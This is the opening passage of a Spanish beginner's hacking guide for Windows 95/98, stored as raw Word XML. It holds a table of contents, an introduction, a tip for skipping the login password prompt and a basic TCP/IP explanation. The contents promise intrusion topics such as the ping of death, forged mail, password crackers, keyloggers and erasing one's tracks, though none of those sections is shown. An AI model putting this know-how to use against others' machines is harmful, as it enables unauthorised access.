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350" w:rsidRPr="00F21EA7" w:rsidRDefault="00205350" w:rsidP="002918F2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F21EA7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>LA SUPER GUIA DEL HACKER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INDICE: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1 ......................... Que Es Esta Guia Exactamente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 ......................... Descripcion General De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2-1 ...................... Seguridad En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 ......................... Protocolo TCP/IP y Demas Historias.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3-1....................... Puertos.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3-2.......................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3-3....................... Telnet.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 ......................... Hacking Basico En Windows.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4-1 ...................... Phf.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4-2 ......................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4-3 ...................... Ping De La Muerte.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4-4 ...................... Recursos Compartidos.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4-5 ...................... Fake Mail Con El Telnet.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4-6 ...................... Cambiando El Entorno.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4-7 ...................... Finger.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4-8 ...................... Whois.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4-9 ...................... Tracert.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4-10 ..................... Winipcfg.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4-11 ..................... Ipconfig.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4-12 ..................... Arp.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4-13 ..................... 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4-14 ..................... Netstat.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 ......................... Utilizacion De Tools.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 ...................... SkamWerks Lab version 1.1b.</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5-2 ...................... WaReZ! Version 95.12.31.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5-3 ...................... John the Ripper v1.4.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5-4 ...................... Gobbler v 2.1.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5-5 ...................... Sharepasswd.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5-6 ...................... Snadboy's Revelation v1.1.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5-7 ...................... Keylog95.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5-8 ...................... Glide.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5-9 ...................... Win95 AnonyMail v 1.0.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5-10 ..................... Hacker's Utility, V 1.02.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5-11 ..................... Haktek v1.1.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5-12 ..................... Claymore Brute Force.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5-13 ..................... Skream's Port Listener V 2.3.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5-14 ..................... WSOCK32 Winsock Spy Facility Version .91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5-15 ..................... PWlTool V 4.0.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5-16 ..................... PwlView V 1.01.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 ......................... Medidas De Seguridad.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6-1 ...................... Protegiendo Nuestro Ordenador.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6-1 ..................... Ataques Tipicos a Nuestro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6-2 ..................... Encriptacion De Nuestra Informacion.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6-3 ..................... Eliminar Informacion De Forma Segura.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6-4 ..................... Eliminacion De Virus.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6-1-1 .................... Protegiendo Nuestras Acciones.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6-1-1-1 ................. Borrando Nuestras Huellas.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6-1-1-2 ................. Encriptando Nuestro Correo.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7 ......................... Sugerencias Para Un Mejor Hacking.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8 ......................... Obtener Informacion.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9 ......................... Despedida.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9-1 ...................... Agradecimientos.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205350" w:rsidP="00205350">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">  1. Que Es Esta Guia Exactamente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guia esta enfocado hacia todo aquel que quiere ser hacker pero no</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">quiere aprender unix </w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>o no lo sabe manejar (grave error). Pues por esta</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>razon esta guia esta enfocada a los usuarios de windows, principalmente</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> los de win95/98. Por el contrario esta guia no se dedicara al NT o Unix,</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>aunque por supuesto se hara referencia a estos sistemas sobre todo cuando</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>son estos mismos Sistemas Operativos en los cuales se centraran nuestros</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> actos, supuestamente legales.</w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">  Todo esto que digo puede sonar tonterias y puedes pensar que en win95/98 no  podras llegar a ser un gran hacker porque es necesario conocer unix, y</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>estoy totalmente de acuerdo, pero solo pretendo dar una oportunidad para</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>hacer sus pinitos a aquellos que solo saber usar win95/98, yo por mi parte</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>aconsejo aprender unix por varias razones que no viene a cuento en esta</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>guia. Con esta guia te convertiras en un magnifico Hacker usando un sistema que</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>no es propenso al hacking. Como es normal al usar win95/98 estaremos muy  limitados en muchos aspectos pero podras aprender por ejemplo, algunos  bug que podras usar en tu favor, la utilizacion de diversas herramientas  hacker que no estan disponibles generalemente en win95/98 y ademas a usar  los recursos que te ofrece Internet en tu favor, abreviando un poco tanta  charla, llegaras a conocer la red de una forma diferente y a manejar</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> win95/98 de forma distinta a lo conocido hasta ahora.</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Esta es la version Deluxe, de mi conocida guia LA SUPER GUIA DEL HACKER, la</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>cual a sido revisada y actualizada, algunas herramientas como el Bo o Netbus</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>no seran explicadas debido a que son realmente faciles de usar y ademas</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>disponen de gran variedad de opciones y me saldria un documento monstruoso.</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Al igual que me he dejado muchas cosas, que a lo mejor gustaria que</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>explicara pero realmente es imposible explicarlo todo, ademas el espiritu hacker es aquella persona que simplemente quiere conocer pero debe</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>investigar por si misma, de nada sirve que este todo hecho. Por eso os digo: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"Si juegas a Hacker, piensa como un Hacker."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205350" w:rsidP="00205350">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">  2.</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E" w:rsidRPr="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> Descripcion General De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Como todos sabemos el windows95/98 es un popular sistema operativo de la</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>casa Microsoft, el cual es conocido tanto por sus adepto ya que es muy  sencillo y vistoso pero al igual tambien es muy conocido por su inseguridad  en casi todos sus aspectos, ademas no ofrece tanta versativilidad como otros  sistemas operativos. Por ejemplo este es el caso de su "Multitarea" la cual  es virtual y no real, si quieres hacer la prueba pon en marcha el defrag y</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>ejecuta otro programa :) y veras esa famosa Multitarea.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 win95/98 es un sistema operativo de 32 bits multitarea, que es muy comodo</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>para la gente que busca facilidad, pero no te enga¤es pensando que es un  sistema ideal para Internet, puede que para un usuario convencional le sea  estupendo pero para un Hacker se queda muy corto de calle, ya que le falta  muchos servicios que otros sistemas operativos si traen como el que ya  tantas veces he repetido, el Unix (se nota que me encanta??:).</w:t>
      </w:r>
      <w:r w:rsidR="00CE750E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">  Aqui os dejo de dar la murga sobre win95/98 ya que este texto no esta  destinado a hablar sobre este sistema sino a usarlo para hackear. Ademas no  creo que este contando nada nuevo sobre windows o sea que mejor me callo y  si no sabes mucho sobre win95/98, pues ya sabes comprate un libro.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CE750E" w:rsidP="00205350">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   2-1. Seguridad En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Como todos sabemos la seguridad en win95/98 es nula, es decir, win95/98 no</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>tiene seguridad por si mismo, un claro ejemplo de esto que es las ventanas  que nos piden un password las podemos cerrar pulsando sobre la X o tambien  nos basta con pulsar ctrl+atl+supr, con lo que nos salteremo esta ventana  sin meter ningun password. Por eso para que nuestro ventanas (nombre que se le da a win95/98 :)  tendremos que instalarle algun paquete de seguridad disponible por la red,  que hay muchos y buenos y lo mejor es que son Freeware (gratis) aunque  siempre puedes comprar algun paquete comercial de seguridad, en mi opinion</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">  alguna veces una tonteria, ya que nos pueden cobrar un precio abusivo y</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>cuando llega la oportunidad de demostrar su calidad nos falla, ya que no  hay nada seguro 100%.</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Proteger nuestro win95/98 es cosa de cada uno pero tranquilidad, que la cosa no es muy dificil, es cuestion de estar atento a las novedades, en otras  palabras estar informado. Mas abajo ya te entereras de estas cosas.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xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>3. Pro</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F" w:rsidRPr="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>tocolo TCP/IP y Demas Historias?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El protocolo TCP/IP, es el mas usado y seguramente no lo sabias, ya que</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>engloba casi todos los servicios que solemos usar como por ejemplo cuando  hacemos telnet, mail, ftp o cualquier cosa.  TCP/IP proviene de Transmission Control Protocol y Internet Protocol</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>respectivamente. Por fortuna para los usuarios de win95/98, este protocolo  ya viene incorporado nativamente en el sistema, al contrario que ocurria con el windows 3.x, el cual lo teniamos que instalar para poder conectar  a Internet.</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Como has podido comprobar en realidad son 2 protocolos pero que estan  unidos, el primero o sea el TCP es el encargado de las comunicaciones y de</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>la transmision de los paquetes cuando estamos conectados a un servidor. El</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>IP es el encargado de que los paquetes llegen a destino por orden aunque</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>tomen caminos diferentes.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Diagrama del TCP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cliente -&gt;  El cliente le envia una  -&gt; servidor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solicitud de </w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">conexión </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>espeficicando el puerto</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>de conexion al servidor.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cliente &lt;-  El servidor le responde  &lt;- servidor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que conoce su peticion</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>de conexion.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cliente -&gt;  El cliente le devuelve   &lt;- servidor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otra vez la peticion y</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>el circuito ya esta</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>abierto.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Diagrama del IP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³Informacion general³Direccion IP³Direccion IP³Datos³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³de cabezera.       ³de origen   ³de destino. ³     ³</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Pues aqui se acaba la explicacion basica de este protocolo, para el que</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
